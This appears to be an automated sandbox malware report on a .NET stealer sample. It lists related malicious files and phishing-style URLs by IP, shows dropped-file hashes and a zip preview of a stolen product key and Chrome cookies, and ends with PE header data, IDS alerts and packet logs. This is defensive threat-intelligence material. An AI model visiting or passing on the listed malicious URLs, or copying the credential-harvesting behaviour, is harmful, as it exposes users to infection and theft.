                          https://azadengg.com/MTQwOTk4NzcwMg==sfmaxWjJWdUxYQm5lQzA0TXpVMU1EZ3dNMmxtZUdOb1lYWmxlbkpwYzNoaGFYSmliM0p1TG1OdmJRPT0=&c=E,1,LZxP3HHb1f9qSYvI9qirqXkUUBAc_Lly3K7xLwNdfYOBECyaKUoAd-t3gcHqWT79cExKeBU56i8wGFRIGcXn5xtHq6aoS1GJuvxV76lYjLuWHw,,&typo=1Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          x.ps1Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          invoker.ps1Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://investors.spotify.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://cache.netflix.com.sg3.wuush.us.kg/Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://apple.vn377.com/Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://apple.dogwog.com/Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          bg.microsoft.map.fastly.netoz9Blof9tN.msiGet hashmaliciousCobaltStrikeBrowse
                          • 199.232.214.172
                          QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 199.232.210.172
                          invoker.ps1Get hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          http://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
                          • 199.232.214.172
                          http://cache.netflix.com.sg3.wuush.us.kg/Get hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          http://apple.vn377.com/Get hashmaliciousUnknownBrowse
                          • 199.232.214.172
                          http://apple.dogwog.com/Get hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          https://phhqqzqh7ydp8nreby0mq5yfr8su0h93.ocalam.com:8443/impact?impact=shanmugasundaramGet hashmaliciousHTMLPhisherBrowse
                          • 199.232.214.172
                          http://apple.fnf478.com/Get hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          http://apple.eph167.com/Get hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          investdirectinsurance.comSWIFT.exeGet hashmaliciousLokibotBrowse
                          • 104.21.65.79
                          SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exeGet hashmaliciousLokibotBrowse
                          • 104.21.65.79
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSrwsNDpQSKZ.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.96.3
                          CBS_applcation_details_072602024_xlsx.jsGet hashmaliciousWSHRATBrowse
                          • 188.114.96.3
                          FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                          • 104.26.2.16
                          8SxJ9aYfJ1.exeGet hashmaliciousFormBookBrowse
                          • 188.114.97.3
                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                          • 104.26.2.16
                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                          • 188.114.96.3
                          https://www.kudoboard.com/boards/ZWwsi9jgGet hashmaliciousUnknownBrowse
                          • 172.67.37.149
                          NsCTgrwBjQ.exeGet hashmaliciousUnknownBrowse
                          • 172.67.177.136
                          NsCTgrwBjQ.exeGet hashmaliciousUnknownBrowse
                          • 172.67.177.136
                          GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 34.117.188.166
                          8NjcvPNvUr.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 34.117.188.166
                          file.exeGet hashmaliciousUnknownBrowse
                          • 34.117.188.166
                          file.exeGet hashmaliciousUnknownBrowse
                          • 34.117.188.166
                          file.exeGet hashmaliciousUnknownBrowse
                          • 34.117.188.166
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 34.117.188.166
                          file.exeGet hashmaliciousUnknownBrowse
                          • 34.117.188.166
                          engine.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          invoker.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          tgmes.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          OTAVANET-ASCZinject.exeGet hashmaliciousXWormBrowse
                          • 79.110.49.233
                          RSPTzXqdcr.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, SugarDump, XWormBrowse
                          • 79.110.49.209
                          3C5XR6Oj4g.exeGet hashmaliciousRedLineBrowse
                          • 79.110.49.209
                          17173975854cf2f83c89e5b8cb6d3f7fbfb13c91374b38f58a44f4c13da06a8fc0d75eb220903.dat-decoded.exeGet hashmaliciousXWormBrowse
                          • 79.110.49.133
                          3kQyFl1vUy.exeGet hashmaliciousSocks5SystemzBrowse
                          • 79.110.49.184
                          file.exeGet hashmaliciousSocks5SystemzBrowse
                          • 79.110.49.184
                          SecuriteInfo.com.Win64.PWSX-gen.29898.16595.exeGet hashmaliciousXWormBrowse
                          • 79.110.49.133
                          SecuriteInfo.com.Win64.PWSX-gen.10080.20186.exeGet hashmaliciousXWormBrowse
                          • 79.110.49.133
                          SecuriteInfo.com.Win64.PWSX-gen.7038.2908.exeGet hashmaliciousXWormBrowse
                          • 79.110.49.133
                          SecuriteInfo.com.Win64.PWSX-gen.3439.2109.exeGet hashmaliciousXWormBrowse
                          • 79.110.49.133
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0eQUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 34.117.59.81
                          FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                          • 34.117.59.81
                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                          • 34.117.59.81
                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                          • 34.117.59.81
                          SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          engine.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          invoker.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          tgmes.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          x.ps1Get hashmaliciousUnknownBrowse
                          • 34.117.59.81
                          37f463bf4616ecd445d4a1937da06e19CBS_applcation_details_072602024_xlsx.jsGet hashmaliciousWSHRATBrowse
                          • 104.21.65.79
                          SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                          • 104.21.65.79
                          SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exeGet hashmaliciousUnknownBrowse
                          • 104.21.65.79
                          SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                          • 104.21.65.79
                          SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                          • 104.21.65.79
                          PO Tournefortian2453525525235235623425523235.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • 104.21.65.79
                          setup.exeGet hashmaliciousAmadeyBrowse
                          • 104.21.65.79
                          setup.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                          • 104.21.65.79
                          file.exeGet hashmaliciousVidarBrowse
                          • 104.21.65.79
                          1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                          • 104.21.65.79
                          No context
                          Process:C:\Users\user\Desktop\Ycj3d5NMhc.exe
                          File Type:CSV text
                          Category:dropped
                          Size (bytes):425
                          Entropy (8bit):5.357964438493834
                          Encrypted:false
                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                          MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                          SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                          SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                          SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                          Malicious:true
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1394
                          Entropy (8bit):5.333002587247594
                          Encrypted:false
                          SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeRE4KYE41LE4DJE4VE4qE4j:MxHKlYHKh3oPtHo6hAHKzeRHKYH1LHDI
                          MD5:3AF5ECAD0528A5C6011C879781385DE6
                          SHA1:35E81B4735772B3744790C3F35AD8906D602E789
                          SHA-256:2FC662335601BABEEAAA73447C92D6F1EE0A1159FC53C77F28683D62353A0C7E
                          SHA-512:CBE5AFB09C9C4ADAB43FF358705B8A10942A18A7954733BDBD96BD8DA5811CA1C4C9B90B404EFDF8DF208AEA4CEEEAAE2171AF6998A0BF24E0FA3C96241C8D53
                          Malicious:false
                          Reputation:low
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Web.Extensions, Version=4.0.0.0, Culture=neutra
                          Process:C:\Users\user\Desktop\Ycj3d5NMhc.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):47616
                          Entropy (8bit):7.3984749546983055
                          Encrypted:false
                          SSDEEP:768:bRinnuikZHazYr+sPVlc1/Sdi0bNxf6lj1rEpBdE4DYywm9Tpfb+pSuGmyZCQrUz:cnpkZHIcs1/rBLDmRBbCqZCQIsPS
                          MD5:3E3D6FD0B466B60CA1E91DC596C05DF3
                          SHA1:9E09372C4597A6405DF167DFE5C2671F1F62A706
                          SHA-256:8F60AA9F4D6672F149B1873CBDB398600A3250019A3CDBB000814C23B92E7C8E
                          SHA-512:FA052957886D4998773AFF3329D3154911DA49D8302E8EC617BBCECF32C4B10552001BE57FDCF0A99CFC1139978B23CE7C35827780E789C2CFA9A3E3F2A179A5
                          Malicious:false
                          Reputation:low
                          Preview:..5.)...TLlfs6.LY.L~!L./.L+.Ll.L.#5q9..L.LY....Ll-L..LYiL~uL.kLY L+XOn.L..LY.L~.L..LY.L+.Ll.L.$LY?L~.L.<LYtL+.Ll'L..LYcL~{L.`LY.L+QLl.L..LY.L~.L..LY.L+.Ll.L.*LY4L~.L.6LYzL+.Ll)M..LYLL~pL.9....R...";x~LY....1......F`...f.R.+....a..,yc.92ws.................%..F..<Ye2..%@..):.....m:s.<.*>.s...je..G..DX...<ks.\X.B.j.|.).Vg....<$.t......YE..x;X......{...TL+=Ll.L..LYCL~[L.@LY|.....L.pLY.l..!..GA.L+.:..w3nx.j...L..LYZL+7Ll.L..LY.L~PL.....L+.Y....1....r;.k.LY.L+.h)\L..LY.L~bZN.LYQL+8Ll.L..LY.L~.....U.L+DLl.L.....L~.L..LY..i.LlVL..LY.L~.L....oL+q./.L..LY.L~qk~.LY.L+z~..L.[LY.L~.L..LY.L+.Ll..*.LY/L~.L.,LYdL+.Ll.L..LY..=kL.LY.L+e.H.L.PLY.L~.L..LY.L+...SL.....VC<L.&LY...Ll.L....L~`L.LY.L+<..L.nLYB...L..LY=L+.LllL..LY..6L.)LYaL+.Ll.L..LY.L~NL.LY.L+.Ll.L.i.U~L~.L.9..7L+.LlfL..LYa.>9L.#LY.......L..LY.L~EL.LY.L+.Ll.L.kLYuL~.L.wLY8L+.LliL..LY.L~3L..LYEM*-Ll.L..).L~KL.LY.L+.Ll?L.`LY{L~.L.xLY2L+.LlcL..LY.L~.L..LYJL+'Ll.L.6LY.L~@L.LY.L+.Ll4L.NLYpL~.L.rLY.L+.LlLL..LY.L~.L..LYAL+(Ll.
                          Process:C:\Users\user\Desktop\Ycj3d5NMhc.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):549888
                          Entropy (8bit):7.500871570223519
                          Encrypted:false
                          SSDEEP:12288:DnDtmWqrM6THOc2IwYtEyzd8IfhH8dcSLQqutRuojljf8Djc:LIWqg6THOZTqz6AhHmLQXtRZWI
                          MD5:52B54991EF7531FC8AFF239E9B513619
                          SHA1:269609F0088B2E84A6A9607BA30FBCDDB9C4ADBD
                          SHA-256:12F4F28C16FB14C9E9D0807368A68624EF82BB1304458980A2D72C39BF03C9E7
                          SHA-512:5014AE36C19761A09040D33CBB5568D6F8352AF6351D31C06AFD65FF5EE4F27265CAF0398410687C09F853D2EC5873EBA494D81DF26B16F9BF589C216FA4764D
                          Malicious:false
                          Reputation:low
                          Preview:..5.)...TLlfs6.LY.L~!L./.L+.Ll.L.#5q9..L.LY....Ll-L..LYiL~uL.kLY L+XOn.L..LY.L~.L..LY.L+.Ll.L.$LY?L~.L.<LYtL+.Ll'L..LYcL~{L.`LY.L+QLl.L..LY.L~.L..LY.L+.Ll.L.*LY4L~.L.6LYzL+.Ll)M..LYLL~pL.9....R...";x~LY....1......F`...f.R.+....a..,yc.92ws.................%..F..<Ye2..%@..):.....m:s.<.*>.s...je..G..DX...<ks.\X.B.j.|.).Vg....<$.t......YE..x;X......{...TL+=Ll.L..LYCL~[L.@LY|.....L.pLY.l..!..GA.L+/...x;;....L..LYZL+7Ll.L..LY.L~PL.....L+.Y..f.1....r;.k.LY.L+..K.Y..LY.L~V\..LYQL+8Ll.L..LY.L~.....$.).DLl.L.....L~.L..LY.L+.LlVL..LY.L~.N..LYoL+q./.L..LY.L~qk~.LY.L+z~..L.[LY.L~.L..LY.L+.Ll..*.LY/L~.L.,LYdL+.Ll.L..LY.O}w&r.LY.L+e.H.L.PLY.L~.L..LY.L+..HSL.....VC<L.&LY...Ll.L....L~`L.LY.L+<..L.nLYB...L..LY=L+.LllL..LY..6L.)LYaL+.Ll.L..LY.L~NL.LY.L+.Ll.|...$.Z.L..'a7L+.LlfL..LY!L~.&r#LY.......L..LY.L~EL.LY.L+.Ll.L.kLYuL~.L.wLY8L+.LliL..LY.L~3L..LY..j....L..).L~KL.LY..8..-.Y.`LY....L.xLY2L+.LlcL..LY.L~.L..LYJL+'Ll.L.6LY.L~@L.LY.L+.Ll4L.NLYpL~.L.rLY.L+.LlLL..LY.L~.L..LYAL+(Ll.
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                          Category:dropped
                          Size (bytes):598
                          Entropy (8bit):6.599323349989143
                          Encrypted:false
                          SSDEEP:12:5jwXvRUCxwY4tLz6ejmzOcLgtTg7iwCNb+wGTm7IsXqCxDQz6sEt:90qFaeOxgpgePZ+wjIyft
                          MD5:91612CB33854C1665206900619930472
                          SHA1:3099F2A90AEE76775FB0501AB8D568111AD06119
                          SHA-256:4B8BA5E517D9F1A3059AD4979CFD559AA398F6E53D03912C3F0D561C484A268D
                          SHA-512:7B3C556C80052EB255CBC0C7E1FF77A4209C3725EE8EF5DEEDF03353EEC89FF8E9266A3D5E3EE54B4E8693E7A5D0B6D1E60F958DC12F8B04594F3E5BB4554D07
                          Malicious:false
                          Reputation:low
                          Preview:PK.........,.Xq..........."...Others\Windows Product Key\key.txt..........2..0....07r..p.....PK.........,.X.&.....4...*...Chromium\Google Chrome\Default\Cookies.txt...R.0.@.=3..?@M@.a...gB...)....`...^.t...N.d.%m(.....Bj.%=..[....,....SC.).....%)@Qe.d........2......4....d...7=.W...].F>.li......{.....)..0......6...H..|...#.;m..qv.r.<F...+q..}...(.Kb..-.4...Ki7l.#Y...;6.`...h.l/W..2C..uE..PK...........,.Xq...........".................Others\Windows Product Key\key.txtPK...........,.X.&.....4...*............._...Chromium\Google Chrome\Default\Cookies.txtPK....................
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):6.5607681406945835
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          • Win32 Executable (generic) a (10002005/4) 49.75%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Windows Screen Saver (13104/52) 0.07%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          File name:Ycj3d5NMhc.exe
                          File size:294'400 bytes
                          MD5:10da3cc4689926de08a0ba47481acead
                          SHA1:37d4b0ce7114c0cc427705f35430656bc3d4c049
                          SHA256:c269ec6cc10cfa210817133e43becae40004a1ddb2220646cddf8a3165bf4269
                          SHA512:9e2e75fa48459e092ab2bf13200762cc9ec3a63603e80b5f208116cade770ef8ed6b0ccbbc65eb77bcc458784b99ffc9a048d587c02615e77261f05c23ef991a
                          SSDEEP:3072:wAzp8YhLI6DhT4PrzD8VHCydY+pkzDqVHzYdKwDdomYcQGIKfjlOh0EJZdzmTRzC:7ptZFT4QndzYdKwDdom1fjS0EgJG
                          TLSH:89548DA033A4C82AD6DF077650E156947735AD825741EB5E38CE38DC5B9A7030F22BBB
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................z..........N.... ........@.. ....................................@................................
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0x44984e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66A2EBB4 [Fri Jul 26 00:20:04 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [0044985Ch]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax+00000004h], bl
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          mov ah, EBh
                          mov byte ptr [00000066h], al
                          add byte ptr [edx], al
                          add byte ptr [eax], al
                          add byte ptr [eax+00h], cl
                          add byte ptr [eax], al
                          sbb byte ptr [eax+7A800004h], 00000004h
                          add byte ptr [edx+53h], dl
                          inc esp
                          push ebx
                          arpl word ptr [eax], bx
                          push eax
                          or eax, 9B4FCD60h
                          jp 00007FE3AC89F933h
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x498000x4c.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a0000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x498640x1c.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x4985c0x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x478c80x47a0037ee2bce863fe073446b90f9ff2d2df7False0.46091704842931935data6.572244100329562IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .reloc0x4a0000xc0x200d3b241482c9c44bcd4d22b47e0a1585dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          DLLImport
                          mscoree.dll_CorExeMain
                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                          2024-07-27T11:38:15.193643+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971813.85.23.86192.168.2.8
                          2024-07-27T11:37:37.062108+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971113.85.23.86192.168.2.8
                          2024-07-27T11:37:20.124935+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa49708443192.168.2.8104.21.65.79
                          2024-07-27T11:37:19.091900+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa49707443192.168.2.8104.21.65.79
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 27, 2024 11:37:15.456314087 CEST49673443192.168.2.823.206.229.226
                          Jul 27, 2024 11:37:15.737596035 CEST49672443192.168.2.823.206.229.226
                          Jul 27, 2024 11:37:17.791685104 CEST49676443192.168.2.852.182.143.211
                          Jul 27, 2024 11:37:17.960139990 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:17.960165977 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:17.960233927 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:17.964155912 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:17.964164972 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:18.447119951 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:18.447197914 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:18.807472944 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:18.807514906 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:18.807889938 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:18.807943106 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:18.814050913 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:18.856504917 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.091934919 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.092061043 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.092060089 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.092124939 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.092204094 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.092283964 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.092286110 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.092286110 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.092286110 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.092312098 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.092344999 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.092366934 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.092380047 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.092432976 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.092442989 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.092505932 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.092516899 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.092573881 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.092585087 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.092638969 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.092649937 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.092708111 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.093713999 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.093776941 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.174091101 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.174575090 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.182075024 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.182162046 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.182193041 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.182257891 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.182274103 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.182343006 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.182353973 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.182383060 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.182415009 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.182457924 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.182476997 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.182531118 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.182585001 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.182645082 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.182661057 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.182718992 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.183159113 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.183223963 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.183245897 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.183300972 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.183332920 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.183391094 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.183412075 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.183465004 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.184042931 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.184102058 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.184120893 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.184180021 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.184200048 CEST44349707104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:19.184254885 CEST49707443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:19.184283972 CEST44349707104.21.65.79192.168.2.8
